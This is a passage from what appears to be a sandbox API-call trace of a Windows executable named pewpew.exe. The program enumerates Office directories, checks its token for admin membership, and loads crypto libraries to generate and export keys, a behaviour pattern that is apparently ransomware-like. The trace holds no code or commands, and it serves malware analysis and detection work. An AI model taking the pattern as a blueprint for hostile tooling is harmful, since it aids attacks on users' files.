ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.546] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.547] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.547] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.547] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.549] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.549] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.549] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.549] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.552] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.553] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.555] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.556] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.560] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.561] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.561] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.562] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.563] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0095.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0095.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0095.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0096.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0096.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0096.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0096.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb40) returned 1 [0096.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ed970) returned 1 [0096.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0096.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0096.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0096.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0096.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb84) returned 1 [0096.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0096.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb40) returned 1 [0096.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ed970) returned 1 [0096.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0097.932] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0098.684] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0102.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb40) returned 1 [0102.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ed970) returned 1 [0103.015] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessW") returned 0x0 [0103.016] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0103.016] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessTokenW") returned 0x0 [0103.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6eeb4c | out: TokenHandle=0x6eeb4c*=0x2d8) returned 1 [0103.023] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0103.024] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0103.024] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformationW") returned 0x0 [0103.025] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x6eeb4c | out: TokenInformation=0x0, ReturnLength=0x6eeb4c) returned 0 [0103.028] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0103.030] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xb6f6e0 [0103.030] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x8, TokenInformation=0xb6f6e0, TokenInformationLength=0x4, ReturnLength=0x6eeb4c | out: TokenInformation=0xb6f6e0, ReturnLength=0x6eeb4c) returned 1 [0103.032] LocalFree (hMem=0xb6f6e0) returned 0x0 [0103.033] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenEx") returned 0x7771ca24 [0103.033] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenExW") returned 0x0 [0103.034] DuplicateTokenEx (in: hExistingToken=0x2d8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x6eeb54 | out: phNewToken=0x6eeb54*=0x2e4) returned 1 [0103.034] GetProcAddress (hModule=0x77710000, lpProcName="CheckTokenMembership") returned 0x7771df04 [0103.035] GetProcAddress (hModule=0x77710000, lpProcName="CheckTokenMembershipW") returned 0x0 [0103.035] CheckTokenMembership (in: TokenHandle=0x2e4, SidToCheck=0x37c7c64*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x6eeb64 | out: IsMember=0x6eeb64) returned 1 [0103.035] CloseHandle (hObject=0x2e4) returned 1 [0103.068] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=11, lpWideCharStr=0x6ed868, cchWideChar=2047 | out: lpWideCharStr="CRYPTSP.dll璠箨T簌T肨µ?nⷲ璢က狶·㗠¯?n") returned 11 [0103.069] SysReAllocStringLen (in: pbstr=0x6ee86c*=0x0, psz="CRYPTSP.dll", len=0xb | out: pbstr=0x6ee86c*="CRYPTSP.dll") returned 1 [0103.069] CharLowerBuffW (in: lpsz="CRYPTSP.dll", cchLength=0xb | out: lpsz="cryptsp.dll") returned 0xb [0103.069] LoadLibraryExA (lpLibFileName="CRYPTSP.dll", hFile=0x0, dwFlags=0x0) returned 0x75230000 [0103.070] GetLastError () returned 0x0 [0103.070] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x75231014, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x4, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x20) returned 0x0 [0103.071] GetCurrentProcess () returned 0xffffffff [0103.071] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x75231014, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x20, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x4) returned 0x0 [0103.071] GetCurrentProcess () returned 0xffffffff [0103.071] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x75231018, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x4, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x20) returned 0x0 [0103.071] GetCurrentProcess () returned 0xffffffff [0103.071] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x75231018, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x20, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x4) returned 0x0 [0103.072] GetCurrentProcess () returned 0xffffffff [0103.072] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x7523101c, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x4, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x20) returned 0x0 [0103.072] GetCurrentProcess () returned 0xffffffff [0103.072] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x7523101c, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x20, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x4) returned 0x0 [0103.072] GetCurrentProcess () returned 0xffffffff [0103.072] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x75231020, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x4, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x20) returned 0x0 [0103.072] GetCurrentProcess () returned 0xffffffff [0103.072] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x75231020, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x20, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x4) returned 0x0 [0103.073] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x7523102c, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x4, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x20) returned 0x0 [0103.073] GetCurrentProcess () returned 0xffffffff [0103.073] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x7523102c, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x20, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x4) returned 0x0 [0103.073] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x752310d0, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x4, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x20) returned 0x0 [0103.074] GetCurrentProcess () returned 0xffffffff [0103.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x752310d0, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x20, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x4) returned 0x0 [0103.074] GetCurrentProcess () returned 0xffffffff [0103.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x752310d4, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x4, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x20) returned 0x0 [0103.074] GetCurrentProcess () returned 0xffffffff [0103.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee858*=0x752310d4, NumberOfBytesToProtect=0x6ee85c, NewAccessProtection=0x20, OldAccessProtection=0x6ee890 | out: BaseAddress=0x6ee858*=0x75231000, NumberOfBytesToProtect=0x6ee85c, OldAccessProtection=0x6ee890*=0x4) returned 0x0 [0103.075] GetProcAddress (hModule=0x75230000, lpProcName="CryptGetDefaultProviderW") returned 0x7523693a [0103.077] GetProcAddress (hModule=0x75230000, lpProcName="CryptAcquireContextW") returned 0x752363e8 [0103.088] GetProcAddress (hModule=0x75230000, lpProcName="CryptGetUserKey") returned 0x75235003 [0103.089] GetProcAddress (hModule=0x75230000, lpProcName="CryptGenKey") returned 0x7523497b [0107.691] GetProcAddress (hModule=0x75790000, lpProcName="SystemFunction040") returned 0x7579444f [0107.692] GetProcAddress (hModule=0x75790000, lpProcName="SystemFunction041") returned 0x757943ee [0107.777] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=11, lpWideCharStr=0x6ed85c, cchWideChar=2047 | out: lpWideCharStr="crypt32.dll") returned 11 [0107.777] SysReAllocStringLen (in: pbstr=0x6ee860*=0x0, psz="crypt32.dll", len=0xb | out: pbstr=0x6ee860*="crypt32.dll") returned 1 [0107.777] CharLowerBuffW (in: lpsz="crypt32.dll", cchLength=0xb | out: lpsz="crypt32.dll") returned 0xb [0107.777] LoadLibraryExA (lpLibFileName="crypt32.dll", hFile=0x0, dwFlags=0x20) returned 0x77550002 [0108.683] GetLastError () returned 0x0 [0108.685] FreeLibrary (hLibModule=0x77550002) returned 1 [0108.687] GetProcAddress (hModule=0x75230000, lpProcName="CryptGetKeyParam") returned 0x75234ebe [0108.812] GetProcAddress (hModule=0x75230000, lpProcName="CryptExportKey") returned 0x752350dd [0108.817] GetProcAddress (hModule=0x75230000, lpProcName="CryptDestroyKey") returned 0x75234cf3 [0108.817] GetProcAddress (hModule=0x75230000, lpProcName="CryptReleaseContext") returned 0x75232ef0 [0108.880] GetProcAddress (hModule=0x75230000, lpProcName="CryptGenRandom") returned 0x75234f73 [0108.937] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e8 [0108.937] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2ec [0108.950] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0108.951] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyEx") returned 0x0 [0108.951] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0108.951] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x6edd3c | out: phkResult=0x6edd3c*=0x2f0) returned 0x0 [0108.952] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueEx") returned 0x0 [0108.952] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0108.952] RegQueryValueExW (in: hKey=0x2f0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x6edd5c, lpData=0x0, lpcbData=0x6edd58*=0x0 | out: lpType=0x6edd5c*=0x1, lpData=0x0, lpcbData=0x6edd58*=0xe) returned 0x0 [0108.953] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueEx") returned 0x0 [0108.953] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0108.953] RegQueryValueExW (in: hKey=0x2f0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x6edd5c, lpData=0x384c3dc, lpcbData=0x6edd58*=0xe | out: lpType=0x6edd5c*=0x1, lpData="Client", lpcbData=0x6edd58*=0xe) returned 0x0 [0108.953] RegCloseKey (hKey=0x2f0) returned 0x0 [0108.962] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0108.962] GetLastError () returned 0x0 [0108.963] SysReAllocStringLen (in: pbstr=0x6eb4c0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x6eb4c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux") returned 1 [0108.963] GetThreadLocale () returned 0x409 [0108.963] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0108.963] GetThreadLocale () returned 0x409 [0108.963] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0108.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x6eb244, lpFilePart=0x6eb240 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", lpFilePart=0x6eb240*="System.Configuration.ni.dll.aux") returned 0x84 [0108.963] SysReAllocStringLen (in: pbstr=0x6eb4c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x6eb4c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux") returned 1 [0108.963] SysReAllocStringLen (in: pbstr=0x6eb470*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x6eb470*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux") returned 1 [0108.963] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", cchLength=0x84 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux") returned 0x84 [0108.963] SysReAllocStringLen (in: pbstr=0x6eb4c0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux", len=0x84 | out: pbstr=0x6eb4c0*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\766a572f745b54553bd34406293b4f78\\system.configuration.ni.dll.aux") returned 1 [0108.963] SetLastError (dwErrCode=0x0) [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] GetCurrentThreadId () returned 0xb0c [0108.963] SetEvent (hEvent=0xbc) returned 1 [0108.963] GetFileSize (in: hFile=0x2f4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x360 [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] GetCurrentThreadId () returned 0xb0c [0108.964] SetEvent (hEvent=0xbc) returned 1 [0108.964] ReadFile (in: hFile=0x2f4, lpBuffer=0xb802d0, nNumberOfBytesToRead=0x360, lpNumberOfBytesRead=0x6eb574, lpOverlapped=0x0 | out: lpBuffer=0xb802d0*, lpNumberOfBytesRead=0x6eb574*=0x360, lpOverlapped=0x0) returned 1 [0108.988] GetCurrentThreadId () returned 0xb0c [0108.988] ResetEvent (hEvent=0xb8) returned 1 [0108.988] GetCurrentThreadId () returned 0xb0c [0108.988] GetCurrentThreadId () returned 0xb0c [0108.988] GetCurrentThreadId () returned 0xb0c [0108.988] GetCurrentThreadId () returned 0xb0c [0108.989] ResetEvent (hEvent=0xb8) returned 1 [0108.989] GetCurrentThreadId () returned 0xb0c [0108.989] GetCurrentThreadId () returned 0xb0c [0108.989] SetEvent (hEvent=0xbc) returned 1 [0108.989] SetEvent (hEvent=0xb8) returned 1 [0108.989] CloseHandle (hObject=0x2f4) returned 1 [0108.997] SysReAllocStringLen (in: pbstr=0x6eaa78*=0x0, psz="System.Configuration.ni.dll", len=0x1b | out: pbstr=0x6eaa78*="System.Configuration.ni.dll") returned 1 [0108.997] CharLowerBuffW (in: lpsz="System.Configuration.ni.dll", cchLength=0x1b | out: lpsz="system.configuration.ni.dll") returned 0x1b [0108.997] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x74740000 [0109.018] GetLastError () returned 0x0 [0109.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", nBufferLength=0x105, lpBuffer=0x6ed6f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", lpFilePart=0x0) returned 0x37 [0109.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", nBufferLength=0x105, lpBuffer=0x6ed6a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", lpFilePart=0x0) returned 0x37 [0109.094] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0109.094] GetLastError () returned 0x0 [0109.094] SysReAllocStringLen (in: pbstr=0x6eb280*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", len=0x70 | out: 